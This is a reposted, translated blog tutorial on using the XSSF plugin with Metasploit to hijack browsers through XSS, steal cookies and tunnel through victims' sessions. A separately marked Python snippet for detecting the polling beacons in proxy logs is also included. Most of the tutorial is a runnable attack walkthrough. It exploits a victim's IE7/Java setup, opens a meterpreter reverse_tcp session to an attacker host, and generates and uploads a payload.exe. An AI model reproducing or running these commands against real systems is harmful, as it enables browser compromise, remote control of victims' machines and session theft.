
Cross Site Scripting Framework (XSSF) is a security toolset designed to quickly discover XSS vulnerabilities in websites. The project exists to verify the XSS vulnerabilities a website has and to show how they can be exploited.

XSSF allows creating a communication channel with the target browser (one affected by an XSS vulnerability) in order to carry out attacks. The user is free to choose from the existing attack modules to run against the target browser.

(My English is poor and I could not be bothered to translate; once converted to English everyone should be able to follow.)

The XSSF framework lets you manage the victims of XSS attacks and keeps a persistent connection with them through a JavaScript "loop" that sends reverse requests back to the framework at defined intervals, so that exploits can be executed against the victim.
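The polling loop described above leaves a very regular trace in outbound proxy logs: the same client fetching the same URL at a near-constant interval. The following added example (not part of the original post or of XSSF itself) flags such streams in constructed Squid-style log lines; the 203.0.113.5 host, the /loop path, and the thresholds are assumptions.

```python
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed Squid-style proxy log lines (epoch time, elapsed ms, client,
# action/code, size, method, URL, ident, hierarchy, type). Client 10.0.0.12
# fetches the assumed attacker URL on a fixed ~5 s cadence, as a browser running
# an XSSF-style JavaScript polling loop would; 10.0.0.7 is normal browsing.
SAMPLE_LOG = """\
1704103200.000 120 10.0.0.12 TCP_MISS/200 312 GET http://203.0.113.5/loop?id=1 - HIER_DIRECT/203.0.113.5 text/html
1704103202.000 80 10.0.0.7 TCP_MISS/200 3120 GET http://example.com/index.html - HIER_DIRECT/198.51.100.20 text/html
1704103205.010 118 10.0.0.12 TCP_MISS/200 312 GET http://203.0.113.5/loop?id=2 - HIER_DIRECT/203.0.113.5 text/html
1704103210.005 121 10.0.0.12 TCP_MISS/200 312 GET http://203.0.113.5/loop?id=3 - HIER_DIRECT/203.0.113.5 text/html
1704103231.000 90 10.0.0.7 TCP_MISS/200 812 GET http://example.com/index.html - HIER_DIRECT/198.51.100.20 text/html
1704103215.002 119 10.0.0.12 TCP_MISS/200 312 GET http://203.0.113.5/loop?id=4 - HIER_DIRECT/203.0.113.5 text/html
1704103300.000 85 10.0.0.7 TCP_MISS/200 812 GET http://example.com/index.html - HIER_DIRECT/198.51.100.20 text/html
1704103220.008 120 10.0.0.12 TCP_MISS/200 312 GET http://203.0.113.5/loop?id=5 - HIER_DIRECT/203.0.113.5 text/html
this line is malformed and must be skipped, not crash the parser
"""

def parse_line(line):
    """Return (epoch_seconds, client, host+path), or None for a malformed line."""
    fields = line.split()
    if len(fields) < 7:
        return None
    try:
        ts = float(fields[0])
    except ValueError:
        return None
    url = urlsplit(fields[6])
    return ts, fields[2], url.netloc + url.path  # query dropped: ids vary per poll

def find_beacons(log_text, min_requests=4, max_cv=0.1):
    """Map (client, url) -> mean gap in seconds for streams whose inter-request
    gaps are nearly constant (coefficient of variation < max_cv): a timer loop."""
    streams = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is not None:
            streams[(rec[1], rec[2])].append(rec[0])
    hits = {}
    for key, times in streams.items():
        if len(times) < min_requests:
            continue
        times.sort()  # log lines may be flushed out of order
        gaps = [b - a for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        if avg > 0 and pstdev(gaps) / avg < max_cv:
            hits[key] = round(avg, 2)
    return hits
```

Human browsing of the same page rarely passes the coefficient-of-variation test, so the check is a useful first filter before looking at what script the flagged page is loading.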

To use XSSF in Metasploit you first need a web application that is vulnerable to XSS. To test and improve skills in web application security there is a project called DVWA (Damn Vulnerable Web Application), an application written in PHP/MySQL that ships with a number of deliberately enabled vulnerabilities, allowing a security professional to interact with the application and understand the possible attacks against web applications.

XSSF provides a documented, powerful API that facilitates the development of modules and attacks. In addition, its integration into the Metasploit Framework lets users launch MSF browser-based exploits easily through an XSS vulnerability.

Exploiting an XSS bug in the victim's browser can let the attacker browse a website from the attacker's own browser using the victim's logged-in session. In most cases, simply stealing the victim's cookie is sufficient to do this.

However, in a few cases (intranets, network-tool portals, etc.) the cookie will not be useful to an external attacker. That is why XSSF Tunnel was created: to let the attacker browse the affected domain using the victim's session.

With XSS we can create a tunnel that connects us to the victim through their web browser. The basic idea is a tunnel that acts as a proxy between the attacker and the exploited XSS-vulnerable application, with the traffic passing through the victim; in this way additional attacks can be run without revealing the attacker's identity, using the victim's identity instead.

The new MSF version, 4.6.0-dev, is supported on:

  • Backtrack 5R3

  • Ubuntu 12.04

  • Kali 1.0

  • Windows 7

XSS (Cross Site Scripting) vulnerabilities

  • Indirect Cross Site Scripting (Reflected) / Reflective XSS

  • Direct Cross Site Scripting (Persistent)

Manual with examples: "XSS for fun and profit"

It allows:

  • Stealing cookies

  • Executing commands (via JavaScript)

  • Executing denial-of-service (DDoS) attacks

XSSF with Metasploit

msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk ./ --force
msfconsole
msf > load xssf Port=80
msf > help xssf

Result of the available commands:

  • xssf_active_victims Shows active victims.

  • xssf_add_auto_attack Adds a new automated attack (launched automatically when a victim connects).

  • xssf_auto_attacks Shows XSSF automated attacks.

  • xssf_banner Prints the XSS Framework banner!

  • xssf_clean_victims Cleans victims in the database (removes waiting attacks).

  • xssf_exploit Launches and injects a module (running in one of its processes) into a given victim.

  • xssf_information Shows information about a given victim.

  • xssf_log Shows the log with a given ID.

  • xssf_logs Shows the logs for a given victim.

  • xssf_remove_auto_attack Removes an automated attack.

  • xssf_remove_victims Removes victims from the database.

  • xssf_restore_state Restores XSSF state (victims, logs, etc.) from the input file.

  • xssf_save_state Saves XSSF state (victims, logs, etc.) to the output file.

  • xssf_servers Shows all attack servers used.

  • xssf_tunnel Provides a tunnel between attacker and victim.

  • xssf_urls Lists the available useful URLs provided by XSSF.

  • xssf_victims Shows all victims.

Example of a victim using Internet Explorer 7 and a vulnerable version of Java in Windows XP.

xssf_victims

1 1 192.168.0.12 true 5 Internet Explorer 7.0 YES

    xssf_information 1

[..] 
            BROWSER NAME : Internet Explorer
            BROWSER VERSION : 7.0
            OS NAME : Windows
            OS VERSION : XP
            ARCHITECTURE : ARCH_X86 
            [..]

    use exploit/multi/browser/java_atomicreferencearray
    set PAYLOAD java/meterpreter/reverse_tcp
    set SRVHOST 192.168.23.200
    set URIPATH xssf
    set LHOST 192.168.23.200
    exploit -j
    jobs

Jobs
        ====
        Id  Name
        --  ----
        0   Exploit: multi/browser/java_atomicreferencearray

    xssf_exploit 1 0

[*] Searching Metasploit launched module with JobID = '0'...
        [+] A running exploit exists: 'Exploit: multi/browser/java_atomicreferencearray'
        [*] Exploit execution started, press [CTRL + C] to stop it !
        [+] Remaining victims to attack: [[1] (1)]
        [+] Code 'Exploit: multi/browser/java_atomicreferencearray' sent to victim '1'
        [+] Remaining victims to attack: NONE

    show sessions

Active sessions
        ===============
        Id  Type              Information            Connection
        --  ----              -----------            ----------
        1   meterpreter java/java  victime @ Victim-PC  192.168.23.200:4444 -> 192.168.23.12:3128 (192.168.23.12)

ruby msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.23.200 LPORT=5555 X > payload.exe
use exploit/multi/handler
exploit -j
upload /opt/metasploit/apps/pro/msf3/payload.exe c
background
sessions -i 1

PS: Writing an article is not easy, and translating is pretty painful too; even though this was only translated into English, I truly admire those translation masters!

via:Elhacker

Reposted from: https://my.oschina.net/u/1188877/blog/282206
